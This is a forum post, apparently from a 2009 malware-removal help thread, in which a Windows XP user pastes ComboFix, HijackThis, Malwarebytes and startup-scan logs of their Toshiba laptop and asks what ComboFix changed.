c:\windows\system32\hkcmd.exe mRun: [00THotkey] c:\windows\system32\00THotkey.exe mRun: [000StTHK] 000StTHK.exe mRun: [LTSMMSG] LTSMMSG.exe mRun: [Apoint] c:\program files\apoint2k\Apoint.exe mRun: [TouchED] c:\program files\toshiba\touched\TouchED.Exe mRun: [PadTouch] "c:\program files\toshiba\padtouch\PadExe.exe mRun: [TFNF5] TFNF5.exe mRun: [TPSMain] TPSMain.exe mRun: [TFncKy] TFncKy.exe mRun: [NeroCheck] c:\windows\system32\NeroCheck.exe mRun: [AVG8_TRAY] c:\progra~1\avg\avg8\avgtray.exe mRun: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE mRun: [Malwarebytes Anti-Malware (reboot)] "c:\program files\malwarebytes' anti-malware\mbam.exe" /runcleanupscript StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\adober~1.lnk - c:\program files\adobe\acrobat 7.0\reader\reader_sl.exe StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\logite~1.lnk - c:\program files\logitech\setpoint\SetPoint.exe StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\micros~2.lnk - c:\program files\common files\microsoft shared\works shared\wkcalrem.exe StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\startg~1.lnk - c:\program files\getright\GetRight.exe IE: Download with GetRight - c:\program files\getright\GRdownload.htm IE: Open with GetRight Browser - c:\program files\getright\GRbrowse.htm IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe IE: {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBC} - c:\program files\java\jre1.6.0_07\bin\ssv.dll IE: {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - {53707962-6F74-2D53-2644-206D7942484F} - c:\progra~1\spybot~1\SDHelper.dll DPF: {17492023-C23A-453E-A040-C7C580BBF700} - hxxp://download.microsoft.com/download/C/0/C/C0CBBA88-A6F2-48D9-9B0E-1719D1177202/LegitCheckControl.cab DPF: {215B8138-A3CF-44C5-803F-8226143CFC0A} - hxxp://housecall65.trendmicro.com/housecall/applet/html/native/x86/win32/activex/hcImpl.cab DPF: {39B0684F-D7BF-4743-B050-FDC3F48F7E3B} - hxxp://www.fileplanet.com/fpdlmgr/cabs/FPDC_2.3.6.108.cab DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} - hxxp://gfx1.hotmail.com/mail/w2/pr02/resources/MSNPUpld.cab DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} - hxxp://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1238014490265 DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://dl8-cdn-01.sun.com/s/ESD44/JSCDL/jdk/6u7/jinstall-6u7-windows-i586-jc.cab?e=1222427383613&h=b8ac855f339f32209a0ec00ff741fe50/&filename=jinstall-6u7-windows-i586-jc.cab DPF: {A796D216-2DE1-4EA8-BABB-FE6E7C959098} - hxxp://www.hp.com/cpso-support-new/SDD/hpsddObjSigned.cab DPF: {A90A5822-F108-45AD-8482-9BC8B12DD539} - hxxp://crucial.com/controls/cpcScanner.cab DPF: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_07-windows-i586.cab DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_07-windows-i586.cab DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab DPF: {D821DC4A-0814-435E-9820-661C543A4679} - hxxp://drmlicense.one.microsoft.com/crlupdate/en/crlocx.ocx Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - c:\program files\avg\avg8\avgpp.dll Notify: avgrsstarter - avgrsstx.dll Notify: igfxcui - igfxsrvc.dll Notify: LBTWlgn - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dll ============= SERVICES / DRIVERS =============== R1 AvgLdx86;AVG AVI Loader Driver x86;c:\windows\system32\drivers\avgldx86.sys [2008-6-19 335240] R1 AvgMfx86;AVG On-access Scanner Minifilter Driver x86;c:\windows\system32\drivers\avgmfx86.sys [2008-6-19 27784] R1 SSHDRV76;SSHDRV76;c:\windows\system32\drivers\SSHDRV76.sys [2008-5-24 53760] R2 avg8wd;AVG8 WatchDog;c:\progra~1\avg\avg8\avgwdsvc.exe [2009-2-2 297752] S3 gkmixern;gkmixern;c:\docume~1\user\locals~1\temp\gkmixern.sys [2003-3-6 15872] S3 SMCWGU(SMC);SMCWUSB-G 802.11g Wireless USB 2.0 Adapter(SMC);c:\windows\system32\drivers\smcwgu.sys --> c:\windows\system32\drivers\SMCWGU.sys [?] =============== Created Last 30 ================ 2009-09-13 03:38 38,224 a------- c:\windows\system32\drivers\mbamswissarmy.sys 2009-09-13 03:38 19,160 a------- c:\windows\system32\drivers\mbam.sys 2009-09-13 03:38 <DIR> --d----- c:\program files\Malwarebytes' Anti-Malware 2009-09-03 04:25 <DIR> --d----- c:\docume~1\user\applic~1\Malwarebytes 2009-09-03 04:25 <DIR> --d----- c:\docume~1\alluse~1\applic~1\Malwarebytes 2009-08-31 22:37 <DIR> --d----- c:\program files\Trend Micro 2009-08-21 11:05 1,717,410 a------- C:\00.bmp ==================== Find3M ==================== 2009-08-24 03:17 123 a------- C:\drmHeader.bin 2009-08-21 06:10 335,240 a------- c:\windows\system32\drivers\avgldx86.sys 2009-08-21 06:10 11,952 a------- c:\windows\system32\avgrsstx.dll 2008-05-14 18:56 32,768 a--sh--- c:\windows\system32\config\systemprofile\local settings\history\history.ie5\mshist012008051420080515\index.dat 2008-03-27 14:15 49,152 a--sh--- c:\windows\temp\temporary internet files\content.ie5\index.dat ============= FINISH: 23:41:55.79 =============== Another Attach.zip has been attached to this post. Next is the ComboFix log: ComboFix 09-09-14.02 - user 15/09/2009 23:53.1.1 - NTFSx86 Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.1007.434 [GMT 1:00] Running from: c:\documents and settings\user\Desktop\Combo-Fix.exe AV: AVG Anti-Virus Free *On-access scanning disabled* (Updated) {17DDD097-36FF-435F-9E1B-52D74245D6BF} . ((((((((((((((((((((((((((((((((((((((( Other Deletions ))))))))))))))))))))))))))))))))))))))))))))))))) . c:\documents and settings\user\Application Data\Microsoft\Installer\{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}\ARPPRODUCTICON.exe c:\recycler\S-1-5-21-1644491937-1767777339-725345543-1003 c:\recycler\S-1-5-21-2616697278-285125850-4245720333-1003 c:\windows\Installer\WMEncoder.msi . ((((((((((((((((((((((((( Files Created from 2009-08-15 to 2009-09-15 ))))))))))))))))))))))))))))))) . 2009-09-13 02:38 . 2009-09-10 13:54 38224 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys 2009-09-13 02:38 . 2009-09-13 02:38 -------- d-----w- c:\program files\Malwarebytes' Anti-Malware 2009-09-13 02:38 . 2009-09-10 13:53 19160 ----a-w- c:\windows\system32\drivers\mbam.sys 2009-09-03 03:25 . 2009-09-03 03:25 -------- d-----w- c:\documents and settings\user\Application Data\Malwarebytes 2009-09-03 03:25 . 2009-09-03 03:25 -------- d-----w- c:\documents and settings\All Users\Application Data\Malwarebytes 2009-08-31 21:37 . 2009-08-31 21:37 -------- d-----w- c:\program files\Trend Micro . (((((((((((((((((((((((((((((((((((((((( Find3M Report )))))))))))))))))))))))))))))))))))))))))))))))))))) . 2009-09-13 08:53 . 2007-06-28 00:17 -------- d-----w- c:\program files\GetRight 2009-09-04 00:19 . 2005-05-27 22:46 -------- d-----w- c:\program files\ahead 2009-09-03 23:36 . 2003-12-03 15:08 -------- d--h--w- c:\program files\InstallShield Installation Information 2009-09-03 23:36 . 2007-08-13 07:14 -------- d-----w- c:\program files\Real 2009-09-03 23:32 . 2008-03-11 21:50 -------- d-----w- c:\program files\Meridian Advance 2009-09-03 01:46 . 2007-07-03 20:38 -------- d-----w- c:\program files\Bulk Image Downloader 2009-09-03 01:45 . 2009-04-16 05:46 -------- d-----w- c:\program files\PicaLoader 2009-08-30 17:55 . 2007-12-29 12:48 -------- d-----w- c:\documents and settings\user\Application Data\uTorrent 2009-08-24 02:17 . 2009-02-27 16:43 123 ----a-w- C:\drmHeader.bin 2009-08-21 10:05 . 2009-07-17 17:33 -------- d-----w- c:\documents and settings\user\Application Data\Free Audio Editor 2009-08-21 05:10 . 2008-06-19 10:53 11952 ----a-w- c:\windows\system32\avgrsstx.dll 2009-08-21 05:10 . 2008-06-19 10:53 335240 ----a-w- c:\windows\system32\drivers\avgldx86.sys 2009-08-21 05:10 . 2008-06-19 10:53 27784 ----a-w- c:\windows\system32\drivers\avgmfx86.sys 2009-07-29 22:14 . 2009-07-29 22:14 -------- d-----w- c:\program files\LucasArts . ((((((((((((((((((((((((((((((((((((( Reg Loading Points )))))))))))))))))))))))))))))))))))))))))))))))))) . . *Note* empty entries & legit default entries are not shown REGEDIT4 [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "NoAds"="c:\program files\NoAds\NoAds.exe" [2007-10-27 151552] "Mmm"="c:\program files\HACE\Mmm\Mmm.exe" [2005-07-05 828416] "WMPNSCFG"="c:\program files\Windows Media Player\WMPNSCFG.exe" [2006-10-18 204288] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "IgfxTray"="c:\windows\System32\igfxtray.exe" [2003-04-07 155648] "HotKeysCmds"="c:\windows\System32\hkcmd.exe" [2003-04-07 114688] "00THotkey"="c:\windows\System32\00THotkey.exe" [2003-05-23 253952] "Apoint"="c:\program files\Apoint2K\Apoint.exe" [2003-07-17 159744] "TouchED"="c:\program files\TOSHIBA\TouchED\TouchED.Exe" [2003-03-11 122880] "PadTouch"="c:\program files\TOSHIBA\PadTouch\PadExe.exe" [2003-11-24 1019904] "NeroCheck"="c:\windows\system32\NeroCheck.exe" [2001-07-09 155648] "AVG8_TRAY"="c:\progra~1\AVG\AVG8\avgtray.exe" [2009-08-21 2007832] "Malwarebytes Anti-Malware (reboot)"="c:\program files\Malwarebytes' Anti-Malware\mbam.exe" [2009-09-10 1312080] "000StTHK"="000StTHK.exe" - c:\windows\system32\000StTHK.exe [2001-06-23 24576] "LTSMMSG"="LTSMMSG.exe" - c:\windows\ltsmmsg.exe [2003-04-18 32768] "TFNF5"="TFNF5.exe" - c:\windows\system32\TFNF5.exe [2003-10-15 73728] "TPSMain"="TPSMain.exe" - c:\windows\system32\TPSMain.exe [2003-11-27 266240] "TFncKy"="TFncKy.exe" [bU] "Kernel and Hardware Abstraction Layer"="KHALMNPR.EXE" - c:\windows\KHALMNPR.Exe [2008-12-18 76304] c:\documents and settings\All Users\Start Menu\Programs\Startup\ Adobe Reader Speed Launch.lnk - c:\program files\Adobe\Acrobat 7.0\Reader\reader_sl.exe [2008-4-23 29696] Logitech SetPoint.lnk - c:\program files\Logitech\SetPoint\SetPoint.exe [2009-6-2 809488] Microsoft Works Calendar Reminders.lnk - c:\program files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe [1999-9-4 53317] Start GetRight.lnk - c:\program files\GetRight\GetRight.exe [2007-6-28 4628752] [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\LBTWlgn] 2009-02-18 23:30 72208 ----a-w- c:\program files\Common Files\Logishrd\Bluetooth\LBTWLgn.dll [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\avgrsstarter] 2009-08-21 05:10 11952 ----a-w- c:\windows\system32\avgrsstx.dll [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WdfLoadGroup] @="" [HKEY_LOCAL_MACHINE\software\microsoft\security center] "AntiVirusOverride"=dword:00000001 [HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List] "%windir%\\system32\\sessmgr.exe"= "%windir%\\Network Diagnostic\\xpnetdiag.exe"= "c:\\Program Files\\GetRight\\GetRight.exe"= "c:\\Program Files\\AVG\\AVG8\\avgupd.exe"= R1 AvgLdx86;AVG AVI Loader Driver x86;c:\windows\system32\drivers\avgldx86.sys [19/06/2008 11:53 335240] R1 SSHDRV76;SSHDRV76;c:\windows\system32\drivers\SSHDRV76.sys [24/05/2008 04:03 53760] R2 avg8wd;AVG8 WatchDog;c:\progra~1\AVG\AVG8\avgwdsvc.exe [02/02/2009 06:00 297752] S3 gkmixern;gkmixern;\??\c:\docume~1\user\LOCALS~1\Temp\gkmixern.sys --> c:\docume~1\user\LOCALS~1\Temp\gkmixern.sys [?] S3 SMCWGU(SMC);SMCWUSB-G 802.11g Wireless USB 2.0 Adapter(SMC);c:\windows\system32\DRIVERS\SMCWGU.sys --> c:\windows\system32\DRIVERS\SMCWGU.sys [?] . Contents of the 'Scheduled Tasks' folder . . ------- Supplementary Scan ------- . uStart Page = hxxp://home.live.com/ uSearchMigratedDefaultURL = hxxp://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8 uInternet Settings,ProxyOverride = <local> uSearchURL,(Default) = hxxp://www.google.com/search?q=%s IE: Download with GetRight - c:\program files\GetRight\GRdownload.htm IE: Open with GetRight Browser - c:\program files\GetRight\GRbrowse.htm . - - - - ORPHANS REMOVED - - - - AddRemove-Power Saver - c:\windows\IsUninst.exe -fc:\program files\TOSHIBA\Power Saver\Uninst.isu AddRemove-TouchED - c:\windows\IsUninst.exe -fc:\program files\TOSHIBA\TouchED\Uninst.isu ************************************************************************** catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net Rootkit scan 2009-09-16 00:01 Windows 5.1.2600 Service Pack 3 NTFS scanning hidden processes ... scanning hidden autostart entries ... scanning hidden files ... ************************************************************************** . --------------------- LOCKED REGISTRY KEYS --------------------- [HKEY_USERS\S-1-5-21-2888162382-313132713-241459312-1006\Software\Microsoft\SystemCertificates\AddressBook*] @Allowed: (Read) (RestrictedCode) @Allowed: (Read) (RestrictedCode) [HKEY_USERS\S-1-5-21-2888162382-313132713-241459312-1006\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{6ED6B123-E96B-45E7-E2F0-5912F5D50D24}*] @Allowed: (Read) (RestrictedCode) @Allowed: (Read) (RestrictedCode) "iaelpmfpbpbijooano"=hex:6a,61,70,61,69,66,70,67,66,6b,65,63,67,67,66,61,6c,67, 6c,65,00,00 "hakllaiaiffaogge"=hex:6a,61,70,61,69,66,70,67,66,6b,65,63,67,67,66,61,6c,67, 6c,65,00,00 . --------------------- DLLs Loaded Under Running Processes --------------------- - - - - - - - > 'winlogon.exe'(620) c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll c:\program files\common files\logishrd\bluetooth\LBTServ.dll . Completion time: 2009-09-15 0:06 ComboFix-quarantined-files.txt 2009-09-15 23:05 Pre-Run: 2,581,270,528 bytes free Post-Run: 3,031,089,152 bytes free WindowsXP-KB310994-SP2-Home-BootDisk-ENU.exe [boot loader] timeout=2 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] c:\cmdcons\BOOTSECT.DAT="Microsoft Windows Recovery Console" /cmdcons multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Home Edition" /fastdetect /NoExecute=OptIn 139 New HijackThis log: Logfile of Trend Micro HijackThis v2.0.2 Scan saved at 00:54:38, on 16/09/2009 Platform: Windows XP SP3 (WinNT 5.01.2600) MSIE: Internet Explorer v7.00 (7.00.6000.16791) Boot mode: Normal Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\spoolsv.exe C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe C:\WINDOWS\System32\svchost.exe C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe C:\PROGRA~1\AVG\AVG8\avgrsx.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\system32\wscntfy.exe C:\WINDOWS\System32\hkcmd.exe C:\WINDOWS\System32\00THotkey.exe C:\WINDOWS\LTSMMSG.exe C:\Program Files\Apoint2K\Apoint.exe C:\Program Files\TOSHIBA\TouchED\TouchED.Exe C:\Program Files\TOSHIBA\PadTouch\PadExe.exe C:\WINDOWS\system32\TFNF5.exe C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe C:\PROGRA~1\AVG\AVG8\avgtray.exe C:\Program Files\NoAds\NoAds.exe C:\Program Files\HACE\Mmm\Mmm.exe C:\Program Files\Windows Media Player\WMPNSCFG.exe C:\WINDOWS\system32\TPSBattM.exe C:\Program Files\Logitech\SetPoint\SetPoint.exe C:\Program Files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe C:\Program Files\Apoint2K\Apntex.exe C:\Program Files\GetRight\GetRight.exe C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.EXE C:\Program Files\internet explorer\iexplore.exe C:\WINDOWS\system32\ctfmon.exe C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe C:\Program Files\Trend Micro\HijackThis\HijackThis.exe R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://home.live.com/ R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896 R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157 O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll (file missing) O2 - BHO: IE to GetRight Helper - {31FF080D-12A3-439A-A2EF-4BA95A3148E8} - C:\Program Files\GetRight\xx2gr.dll O2 - BHO: WormRadar.com IESiteBlocker.NavFilter - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - C:\Program Files\AVG\AVG8\avgssie.dll O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll (file missing) O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\3.0.1225.9868\swg.dll (file missing) O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll (file missing) O4 - HKLM\..\Run: [igfxTray] C:\WINDOWS\System32\igfxtray.exe O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\System32\hkcmd.exe O4 - HKLM\..\Run: [00THotkey] C:\WINDOWS\System32\00THotkey.exe O4 - HKLM\..\Run: [000StTHK] 000StTHK.exe O4 - HKLM\..\Run: [LTSMMSG] LTSMMSG.exe O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe O4 - HKLM\..\Run: [TouchED] C:\Program Files\TOSHIBA\TouchED\TouchED.Exe O4 - HKLM\..\Run: [PadTouch] "C:\Program Files\TOSHIBA\PadTouch\PadExe.exe O4 - HKLM\..\Run: [TFNF5] TFNF5.exe O4 - HKLM\..\Run: [TPSMain] TPSMain.exe O4 - HKLM\..\Run: [TFncKy] TFncKy.exe O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\system32\NeroCheck.exe O4 - HKLM\..\Run: [AVG8_TRAY] C:\PROGRA~1\AVG\AVG8\avgtray.exe O4 - HKLM\..\Run: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE O4 - HKLM\..\Run: [Malwarebytes Anti-Malware (reboot)] "C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe" /runcleanupscript O4 - HKCU\..\Run: [NoAds] "C:\Program Files\NoAds\NoAds.exe" O4 - HKCU\..\Run: [Mmm] "C:\Program Files\HACE\Mmm\Mmm.exe" O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe O4 - Global Startup: Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe O4 - Global Startup: Microsoft Works Calendar Reminders.lnk = ? O4 - Global Startup: Start GetRight.lnk = C:\Program Files\GetRight\GetRight.exe O8 - Extra context menu item: Download with GetRight - C:\Program Files\GetRight\GRdownload.htm O8 - Extra context menu item: Open with GetRight Browser - C:\Program Files\GetRight\GRbrowse.htm O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O14 - IERESET.INF: START_PAGE_URL=file:///C:\Program Files\TOSHIBA\Free Update Service\splash.html O16 - DPF: {215B8138-A3CF-44C5-803F-8226143CFC0A} (Trend Micro ActiveX Scan Agent 6.6) - http://housecall65.trendmicro.com/housecal...ivex/hcImpl.cab O16 - DPF: {39B0684F-D7BF-4743-B050-FDC3F48F7E3B} - http://www.fileplanet.com/fpdlmgr/cabs/FPDC_2.3.6.108.cab O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} (MSN Photo Upload Tool) - http://gfx1.hotmail.com/mail/w2/pr02/resources/MSNPUpld.cab O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/...b?1238014490265 O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} (Java Runtime Environment 1.6.0) - http://dl8-cdn-01.sun.com/s/ESD44/JSCDL/jd...ows-i586-jc.cab O16 - DPF: {A796D216-2DE1-4EA8-BABB-FE6E7C959098} (HPSDDX Class) - http://www.hp.com/cpso-support-new/SDD/hpsddObjSigned.cab O16 - DPF: {A90A5822-F108-45AD-8482-9BC8B12DD539} (Crucial cpcScan) - http://crucial.com/controls/cpcScanner.cab O16 - DPF: {D821DC4A-0814-435E-9820-661C543A4679} (CRLDownloadWrapper Class) - http://drmlicense.one.microsoft.com/crlupdate/en/crlocx.ocx O18 - Protocol: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG8\avgpp.dll O20 - Winlogon Notify: avgrsstarter - C:\WINDOWS\SYSTEM32\avgrsstx.dll O23 - Service: AVG8 WatchDog (avg8wd) - AVG Technologies CZ, s.r.o. - C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe O23 - Service: C-DillaSrv - C-Dilla Ltd - C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE O23 - Service: ConfigFree Service (CFSvcs) - TOSHIBA CORPORATION - C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe O23 - Service: Google Updater Service (gusvc) - Unknown owner - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe (file missing) O23 - Service: Logitech Bluetooth Service (LBTServ) - Logitech, Inc. - C:\Program Files\Common Files\Logishrd\Bluetooth\LBTServ.exe O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe -- End of file - 8375 bytes I got an error when using HJT that I hadn't seen before. It didn't explain what it was but the scan seemed to go okay. I ran it again just to see if it would do it again but it was okay the second time round. I have seen a new folder appear in C:\ called Qoobox. I am guessing that is all to do with ComboFix. I don't know what ComboFix did but viewing the log looked as if it deleted some programs, such as GetRight, and two Toshiba uninstallation files. GetRight was no longer running in the System Tray. I rebooted the PC before posting this and the apps I thought it deleted are running again. I may have misinterpreted the log file and they were only shut down temporarily. The Toshiba files were classed as orphans(?). Because I have got zero understanding of ComboFix and because I saw another log file in Qoobox called "ComboFix-quarantined-files.txt", I thought I would copy and paste that here too: 2009-09-15 23:03:39 . 2009-09-15 23:03:39 680 ----a-w- C:\Qoobox\Quarantine\Registry_backups\AddRemove-TouchED.reg.dat 2009-09-15 23:03:39 . 2009-09-15 23:03:39 782 ----a-w- C:\Qoobox\Quarantine\Registry_backups\AddRemove-Power Saver.reg.dat 2009-09-15 22:58:09 . 2009-09-15 22:58:09 6,869 ----a-w- C:\Qoobox\Quarantine\Registry_backups\tcpip.reg 2009-09-15 22:46:21 . 2009-09-15 22:46:21 51 ----a-w- C:\Qoobox\Quarantine\catchme.log 2009-06-02 21:35:53 . 2009-06-02 21:35:53 53,248 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\user\Application Data\Microsoft\Installer\{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}\ARPPRODUCTICON.exe.vir 2002-12-11 19:39:08 . 2002-12-11 19:39:08 10,995,712 ----a-w- C:\Qoobox\Quarantine\C\WINDOWS\Installer\WMEncoder.msi.vir Internet Explorer has gone back to certain default settings, such as warning I am moving to a secure server, which I assume is supposed to happen after ComboFix has done its thing. I am still hearing that damn disk access every ten seconds so I don't know what could be doing that anymore. Just out of curiosity, does ComboFix check for router hijacking software? Thanks again. Attach.zip

Sorry for the delay. I ran a quick scan yesterday but wanted to do a full scan today, seeing as there was a new version of MBAM. Here is the latest MBAM log: Malwarebytes' Anti-Malware 1.41 Database version: 2792 Windows 5.1.2600 Service Pack 3 13/09/2009 23:56:27 mbam-log-2009-09-13 (23-56-27).txt Scan type: Full Scan (C:\|) Objects scanned: 182979 Time elapsed: 1 hour(s), 44 minute(s), 28 second(s) Memory Processes Infected: 0 Memory Modules Infected: 0 Registry Keys Infected: 0 Registry Values Infected: 0 Registry Data Items Infected: 0 Folders Infected: 0 Files Infected: 0 Memory Processes Infected: (No malicious items detected) Memory Modules Infected: (No malicious items detected) Registry Keys Infected: (No malicious items detected) Registry Values Infected: (No malicious items detected) Registry Data Items Infected: (No malicious items detected) Folders Infected: (No malicious items detected) Files Infected: (No malicious items detected) It looks like that rootkit has finally been terminated, thanks to the new version of MBAM. Just in case, I have posted a new HijackThis log: Logfile of Trend Micro HijackThis v2.0.2 Scan saved at 04:07:31, on 14/09/2009 Platform: Windows XP SP3 (WinNT 5.01.2600) MSIE: Internet Explorer v7.00 (7.00.6000.16791) Boot mode: Normal Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\spoolsv.exe C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe C:\WINDOWS\System32\svchost.exe C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe C:\PROGRA~1\AVG\AVG8\avgrsx.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\system32\wscntfy.exe C:\WINDOWS\System32\hkcmd.exe C:\WINDOWS\System32\00THotkey.exe C:\WINDOWS\LTSMMSG.exe C:\Program Files\Apoint2K\Apoint.exe C:\Program Files\TOSHIBA\TouchED\TouchED.Exe C:\Program Files\TOSHIBA\PadTouch\PadExe.exe C:\WINDOWS\system32\TFNF5.exe C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe C:\PROGRA~1\AVG\AVG8\avgtray.exe C:\Program Files\NoAds\NoAds.exe 